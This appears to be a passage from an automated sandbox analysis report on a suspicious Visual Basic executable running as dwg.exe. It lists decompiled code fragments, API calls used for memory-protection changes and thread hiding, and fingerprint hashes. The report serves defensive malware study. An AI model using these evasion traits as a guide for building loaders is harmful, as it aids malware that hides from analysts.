					_push(0x58);
					_push(0x404a60);
					_push(_a4);
					_push(_v72);
					L00401324();
					_v84 = _t30;
				}
				HideCaret(_v68);
				L0040131E();
				_push(0);
				_t32 =  *0x0040CDC0();
				asm("aam 0xa");
				 *_t32 =  *_t32 + _t32;
				_v397355967 = _v397355967 + _t35;
				goto ( *((intOrPtr*)(_t39 - 0x77)));
			}


















                                                  0x00411026
                                                  0x00411030
                                                  0x00411038
                                                  0x0041103b
                                                  0x00411042
                                                  0x00411051
                                                  0x00411060
                                                  0x00411063
                                                  0x00411065
                                                  0x0041106c
                                                  0x00411085
                                                  0x0041106e
                                                  0x0041106e
                                                  0x00411070
                                                  0x00411075
                                                  0x00411078
                                                  0x0041107b
                                                  0x00411080
                                                  0x00411080
                                                  0x0041108c
                                                  0x00411091
                                                  0x0041109b
                                                  0x004110a3
                                                  0x004110a6
                                                  0x004110a8
                                                  0x004110aa
                                                  0x004110b3

                                                  APIs
                                                  • __vbaChkstk.MSVBVM60(?,00401216), ref: 00411030
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,004010D8,00404A60,00000058), ref: 0041107B
                                                  • HideCaret.USER32(?), ref: 0041108C
                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,004010D8,00404A60,00000058), ref: 00411091
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247262762.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.247259243.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247273293.0000000000414000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __vba$CaretCheckChkstkErrorHideHresultSystem
                                                  • String ID:
                                                  • API String ID: 2881382524-0
                                                  • Opcode ID: 7344d1d5797a8f14107e8c85609d8710351aa0089dcce05e423a4c973f092589
                                                  • Instruction ID: 6627d63e44aa949422a2b71749524e0f554cf95880511b073d052e3c71167801
                                                  • Opcode Fuzzy Hash: 7344d1d5797a8f14107e8c85609d8710351aa0089dcce05e423a4c973f092589
                                                  • Instruction Fuzzy Hash: DE114870A44688EFDB11EFA5CC0AB8DBFB4EF45745F00806AF844BB5A1C37899858B55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Analysis Process: dwg.exe PID: 1544 Parent PID: 5316 dwg.exeCOMMON

                                                  Executed Functions

                                                  Function 00565D76, Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 599nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00565978,00000040,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00565DCA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: MemoryProtectVirtual
                                                  • String ID: H}e
                                                  • API String ID: 2706961497-725671990
                                                  • Opcode ID: e95bfe81c3cada7a13e57e720e63fdd88dba92114ed405be5f5861f97851235c
                                                  • Instruction ID: 9319619de8f8bcf12ae8548fd3f9580ef7affe6b28dcc86f9c98f409fa079973
                                                  • Opcode Fuzzy Hash: e95bfe81c3cada7a13e57e720e63fdd88dba92114ed405be5f5861f97851235c
                                                  • Instruction Fuzzy Hash: 35E1FEB161C7914EEB1A532489DB7757F66FF93316F68409EC8C3C3893EA9298438316
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00565DE2, Relevance: 1.9, APIs: 1, Instructions: 413COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1abeb2737998bab0fef42c2ab1b9236045740fd9d75ba453520a9b164bf0a8d3
                                                  • Instruction ID: 71d4fbe13cb8470b2ed132ceeb2a72917785ddebe37446f2315923d40dbaf9e0
                                                  • Opcode Fuzzy Hash: 1abeb2737998bab0fef42c2ab1b9236045740fd9d75ba453520a9b164bf0a8d3
                                                  • Instruction Fuzzy Hash: 01A1BC7121C7518EEB1E8A24C89ABB53FA6FF53321F68419EC8C3C34A3E655EC428351
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00565DCF, Relevance: 1.9, APIs: 1, Instructions: 410COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 783263f566285945f1d151ea70b7af56a2047cbd3a7cb731e86234739f052526
                                                  • Instruction ID: 5d20e97d7a6304c288f403685fea5f9d093ef775a5dff4dde9aa90fa5fe2e299
                                                  • Opcode Fuzzy Hash: 783263f566285945f1d151ea70b7af56a2047cbd3a7cb731e86234739f052526
                                                  • Instruction Fuzzy Hash: 96A1BC7121C7518EEB1E8624C89ABB53FA5FB53311F68459ED8C3C3493E655EC428351
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00565E08, Relevance: 1.9, APIs: 1, Instructions: 387COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52e3907f4eb29c1ed1c07f3583ba83eaa03fd49baa5b71697ef56eaf06fc558a
                                                  • Instruction ID: 9394e55716944faf6931aeda2ef6944338a07c6d9206663107a31601f0c318a5
                                                  • Opcode Fuzzy Hash: 52e3907f4eb29c1ed1c07f3583ba83eaa03fd49baa5b71697ef56eaf06fc558a
                                                  • Instruction Fuzzy Hash: 3F917A7121C7518EEB1E9624C89ABB57FA6FF53311F58409ED8C3C34A3EA95EC428351
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005664C6, Relevance: 1.9, APIs: 1, Instructions: 377nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,?,?,000000C0), ref: 005666DF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: 897b68c1ac7471d23daf451430af6d3e1d9e6388caef7b677c9d9f2f61745028
                                                  • Instruction ID: db616f99e2d7e54fc62c7ba227b1e162e994625857a2d5abcbad9b49bb7942d1
                                                  • Opcode Fuzzy Hash: 897b68c1ac7471d23daf451430af6d3e1d9e6388caef7b677c9d9f2f61745028
                                                  • Instruction Fuzzy Hash: 4CC159711193859FCB169A3484AE7E5BF62FFD2314F68469EC8C38B963C7229847CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0056587D, Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: LibraryLoadMemoryProtectVirtual
                                                  • String ID:
                                                  • API String ID: 3389902171-0
                                                  • Opcode ID: 04f4c88c63cc144ad9f3653d971f2e40dbdc99cfb1daf8ea2e91cb841f393353
                                                  • Instruction ID: 5f4281d5d304f42535b71853b4755b2995861de867274e9a86e7fb430aa9063c
                                                  • Opcode Fuzzy Hash: 04f4c88c63cc144ad9f3653d971f2e40dbdc99cfb1daf8ea2e91cb841f393353
                                                  • Instruction Fuzzy Hash: EDB12A70A447429EDF349E78C4D87A97F92BF52360F548759D9A28B2E6E3348882C712
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00565F0B, Relevance: 1.8, APIs: 1, Instructions: 324COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 60200f336dd192489002f7bcc28ccb41aabaf468bd9b6df2576e0eacafbf0941
                                                  • Instruction ID: 52dd08f58776add815b8a743aebfa0104e38d1863b5b9aec6ae405d3b9b51954
                                                  • Opcode Fuzzy Hash: 60200f336dd192489002f7bcc28ccb41aabaf468bd9b6df2576e0eacafbf0941
                                                  • Instruction Fuzzy Hash: B981AD7121C7518EEF1A8B24C8A97B47FA2FF62314F68459EC883C75A3EB65D885C341
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005666EB, Relevance: 1.8, APIs: 1, Instructions: 281nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,?,?,000000C0), ref: 005666DF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: fd5cd046e06492a7a45c684799dcdec7c80ca45f65c0805aa4f7332b1458bc11
                                                  • Instruction ID: 89c8d74186b5139a0a663495f222c12191a80f0bfa39af0ded8d11f956bf9c06
                                                  • Opcode Fuzzy Hash: fd5cd046e06492a7a45c684799dcdec7c80ca45f65c0805aa4f7332b1458bc11
                                                  • Instruction Fuzzy Hash: AE818D2110D3C69FCB1AAB3484AE5E5BF62FFC2704B28468ED4D24B963C7259947CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00566487, Relevance: 1.6, APIs: 1, Instructions: 150COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 14db0cff0f8fc53cbc314b080203c19948db9ab231b98a04c5611ed69426e269
                                                  • Instruction ID: 0482aab5591f2b3d80a75a3c680336e7507e8cb66506b2d8087523d8fe0583a0
                                                  • Opcode Fuzzy Hash: 14db0cff0f8fc53cbc314b080203c19948db9ab231b98a04c5611ed69426e269
                                                  • Instruction Fuzzy Hash: 73419C312053428EEF261A24C16A7A5BF53FFA2769FEC055ECC8387566D762C885C742
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00566384, Relevance: 1.6, APIs: 1, Instructions: 148COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9147f6f27e0c9c7be2e9a48398ce4eb32f9d3035a47775c3dae2ce33f66018b9
                                                  • Instruction ID: e3779cdd5806caaaccb823bc7b9193bac3e0ad1892f1a25b02fc12d602082222
                                                  • Opcode Fuzzy Hash: 9147f6f27e0c9c7be2e9a48398ce4eb32f9d3035a47775c3dae2ce33f66018b9
                                                  • Instruction Fuzzy Hash: BD4189302083028EEF2A4A20C5A97B5AF53FF62769FBC4A6ECC4383591DB75D884C711
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0056637E, Relevance: 1.6, APIs: 1, Instructions: 138nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,?,?,000000C0), ref: 005666DF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: 3f49393209737e6b16d98158407b803d5ff10e6e92375f5d448edd75a6232ba2
                                                  • Instruction ID: 3077e133993bef7ce2babbcba5084af000cb36cec2ce6c4db3de430dd2ccbeea
                                                  • Opcode Fuzzy Hash: 3f49393209737e6b16d98158407b803d5ff10e6e92375f5d448edd75a6232ba2
                                                  • Instruction Fuzzy Hash: 94413931204306CEEF294E24C5A97F96E92FF62769FB84A2ADC4387294D735D8C8D641
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00566466, Relevance: 1.6, APIs: 1, Instructions: 137nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,?,?,000000C0), ref: 005666DF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: aee2c297a135935df69993dc5d583f453d24ae64c65e2b7ab7c26d810324be76
                                                  • Instruction ID: ac28a574b861e78e22224cbffa62c170c294962a9aacf675eb892a5c865bcd16
                                                  • Opcode Fuzzy Hash: aee2c297a135935df69993dc5d583f453d24ae64c65e2b7ab7c26d810324be76
                                                  • Instruction Fuzzy Hash: 474189302083028EEF2A0A24C1AA7B5AF52FF62769FEC055ECC8383595D776C884C751
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005663CA, Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a1c09883ef516f5cf41be9f796bb13b5eb1cfdd6d08201b07687ef6684135da5
                                                  • Instruction ID: 46566e465b68515515127248dfe250d996d6462b14bcd76bd930eb3e37ae0179
                                                  • Opcode Fuzzy Hash: a1c09883ef516f5cf41be9f796bb13b5eb1cfdd6d08201b07687ef6684135da5
                                                  • Instruction Fuzzy Hash: AA4148302043028EEF294E14C5A97F96E52FF62769FBC4A6EDC4387194D735D8C8C651
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00566533, Relevance: 1.6, APIs: 1, Instructions: 132nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,?,?,000000C0), ref: 005666DF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: 6fadb5f0d647729c958ea5940151021b53b6dddabb6c08e39a34ac16f183d99d
                                                  • Instruction ID: 4152a0ea4c687190529b2d494431cb0faacc64fc6de2075cdf108b0a52269866
                                                  • Opcode Fuzzy Hash: 6fadb5f0d647729c958ea5940151021b53b6dddabb6c08e39a34ac16f183d99d
                                                  • Instruction Fuzzy Hash: 3D418D706183428DEF164A24C46D3A1BF13FFA2769FEC455ECC8383492D7629885C755
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0056640E, Relevance: 1.6, APIs: 1, Instructions: 125nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,?,?,000000C0), ref: 005666DF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: 3e9e0e0c17805baf5e64d05d0f78e21e7b74a152a2645469c5b92e062cde135d
                                                  • Instruction ID: 49729cf9b248fa5782305ba1b5366a640aeb017560ea03e360f57f6025641111
                                                  • Opcode Fuzzy Hash: 3e9e0e0c17805baf5e64d05d0f78e21e7b74a152a2645469c5b92e062cde135d
                                                  • Instruction Fuzzy Hash: 7F4155306043028EEF294A20C5A97F97F62FF62769FBC4A6ECC4397194D735D884C641
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00566558, Relevance: 1.6, APIs: 1, Instructions: 99nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,?,?,000000C0), ref: 005666DF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: 3dee2d157be57ff8bb80fae40683913cca79eaf3536f55c49dd7cceadd4ce15d
                                                  • Instruction ID: 6db6ea576d2e46dda831f7d53d8790dcc059b831452241afc1fadc6f706cb97c
                                                  • Opcode Fuzzy Hash: 3dee2d157be57ff8bb80fae40683913cca79eaf3536f55c49dd7cceadd4ce15d
                                                  • Instruction Fuzzy Hash: 773167706053428EEF294A20C469BA5BF53FF62728FEC425ECC83475A1C775D884CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00566596, Relevance: 1.6, APIs: 1, Instructions: 84nativethreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,?,?,000000C0), ref: 005666DF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: 07a97b26450ee016535da6cca50466d499b615bed11722397200c9841e186d84
                                                  • Instruction ID: 895aa923ac0588502c0f68e9ab915ff1bdb671afad25629af8eb1e98de8f3fcb
                                                  • Opcode Fuzzy Hash: 07a97b26450ee016535da6cca50466d499b615bed11722397200c9841e186d84
                                                  • Instruction Fuzzy Hash: 0121D6706013068EEF294E24C568BE5BF62FF62769FAC566ECC42871A1C735D8C4CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00564B00, Relevance: 1.5, APIs: 1, Instructions: 49libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNELBASE(?,595014AD,?,005625AB,?,00000000,00000000,?), ref: 00564B8C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 055ab54e18e92ebe232413edd719dac09e5ce04bdb2ca7b69aece9c560c99b9c
                                                  • Instruction ID: a6a4a623c2cf798a9803a6e6301cbd2eecf13275008d0ab66fc7b6d7a0e5fb0f
                                                  • Opcode Fuzzy Hash: 055ab54e18e92ebe232413edd719dac09e5ce04bdb2ca7b69aece9c560c99b9c
                                                  • Instruction Fuzzy Hash: 3EF0815070011729DF283730CDA9B7E6C06BFE1770F10822DBD7153196CE98C4C40D12
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00565DB1, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00565978,00000040,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00565DCA
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                                  Similarity
                                                  • API ID: MemoryProtectVirtual
                                                  • String ID:
                                                  • API String ID: 2706961497-0
                                                  • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                                  • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                                                  • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                                  • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E289660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3108ab195c251711274914bb48f32abc610f8c86f882e916295c4f50a22b18ba
                                                  • Instruction ID: 9b6e280226f1a8ea052aa3bf25e6b330f4c18527fddaa59cf4559837336154dc
                                                  • Opcode Fuzzy Hash: 3108ab195c251711274914bb48f32abc610f8c86f882e916295c4f50a22b18ba
                                                  • Instruction Fuzzy Hash: 6A90027120101803D180716A451464E000557D1741FD1D115E0025614DCA558E5977F1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E2896E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: f6335ef7f5b8bb30bd923a85b9b8eef394e10605cd3d3e922aab0c6b463acbb3
                                                  • Instruction ID: fcc260caacbeae8d03460cde698225e277881123ee43ecba914090f7ad6ca58d
                                                  • Opcode Fuzzy Hash: f6335ef7f5b8bb30bd923a85b9b8eef394e10605cd3d3e922aab0c6b463acbb3
                                                  • Instruction Fuzzy Hash: 7090027120109803D110616A851474E000557D0741F95D511E4424618DC6D58C917171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E289710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: d43dfd3b258193fd0ec760f3498dc161dc59b3e9fc3c247643115475d609db25
                                                  • Instruction ID: ab55222528346c41cdf4cfa3a4e58d074cd72f8689136c41612472f91654ea2f
                                                  • Opcode Fuzzy Hash: d43dfd3b258193fd0ec760f3498dc161dc59b3e9fc3c247643115475d609db25
                                                  • Instruction Fuzzy Hash: CD90027120101403D10065AA551864A000557E0741F91E111E5024515EC6A58C917171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E2897A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6ca75892928b7545ba306660fa46d1069663895d62d6fe3b7b0e64201e87261d
                                                  • Instruction ID: b44572d51616a2bd34511f0c9303272ab3d369b317203b511d02b624eb417980
                                                  • Opcode Fuzzy Hash: 6ca75892928b7545ba306660fa46d1069663895d62d6fe3b7b0e64201e87261d
                                                  • Instruction Fuzzy Hash: 8C90026130101003D140716A552860A4005A7E1741F91E111E0414514CD9558C567272
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E289780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0f4a6efb31b7c24915fdd6568f2c85161b2f5ca9b9b87f71186f189106e75466
                                                  • Instruction ID: eacdffbba0354d94c7b0f17aba853c60e4698f6328d6138778060b59f7f8bb8f
                                                  • Opcode Fuzzy Hash: 0f4a6efb31b7c24915fdd6568f2c85161b2f5ca9b9b87f71186f189106e75466
                                                  • Instruction Fuzzy Hash: 3D90026921301003D180716A551860E000557D1642FD1E515E0015518CC9558C697371
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E289FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0324b7518409a91164273f573f8cdecd437cfb757d11d64d3931bafc5c9619d0
                                                  • Instruction ID: 07dc5ce0ba12254e564fabb22b591dc444775ada180dbaba37929f2293ead765
                                                  • Opcode Fuzzy Hash: 0324b7518409a91164273f573f8cdecd437cfb757d11d64d3931bafc5c9619d0
                                                  • Instruction Fuzzy Hash: 8090027131115403D110616A851470A000557D1641F91D511E0824518DC6D58C917172
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E289540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 87adce8781f0eee86edc796eb75948785679d6a06a41657c588879443bbdada2
                                                  • Instruction ID: a5f69d20b579d66f55ba8648cd762867639e66d82163f275ec2bb19393577598
                                                  • Opcode Fuzzy Hash: 87adce8781f0eee86edc796eb75948785679d6a06a41657c588879443bbdada2
                                                  • Instruction Fuzzy Hash: 1D900475311010030105F57F071450F004757D57D13D1D131F1015510CD771CC717171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E2895D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 992ba0b05d9ee4bc3a7903c1ffbe3cecadf4076792a4a65c75fa0725738e1660
                                                  • Instruction ID: 70a1179d1b81b08f508b0c1a5cd5093568cc943282e313a91defd2109475defd
                                                  • Opcode Fuzzy Hash: 992ba0b05d9ee4bc3a7903c1ffbe3cecadf4076792a4a65c75fa0725738e1660
                                                  • Instruction Fuzzy Hash: 819002A1202010034105716A452461A400A57E0641B91D121E1014550DC5658C917175
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1E289A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.312378278.000000001E220000.00000040.00000001.sdmp, Offset: 1E220000, based on PE: true
                                                  • Associated: 00000001.00000002.312548721.000000001E33B000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a4286f95590b01fff3a525da65590dfe6d270398ce89004be055d89143784aff
